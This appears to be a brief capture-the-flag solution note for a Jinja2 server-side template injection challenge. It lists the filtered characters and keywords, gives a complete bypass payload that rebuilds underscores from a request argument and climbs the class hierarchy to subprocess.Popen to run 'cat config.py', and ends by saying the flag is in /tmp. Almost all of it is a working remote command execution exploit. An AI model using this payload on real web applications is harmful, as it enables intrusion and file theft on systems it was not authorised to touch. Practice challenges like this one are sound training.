
blacklistig = _ , [, ], self, config, mro, request.environ, shutdown, url_for, + , 5f 

final payload = http://localhost:8001/?payload={{()|attr((request.args.usc*2,%27class%27,request.args.usc*2)|join)|attr((request.args.usc*2,%27base%27,request.args.usc*2)|join)|attr((request.args.usc*2,%27subclasses%27,request.args.usc*2)|join)()|attr((request.args.usc*2,%27getitem%27,request.args.usc*2)|join)(408)(%27cat%20config.py%27,shell=True,stdout=-1)|attr(%27communicate%27)()}}&usc=_


flag.txt in tmp folder 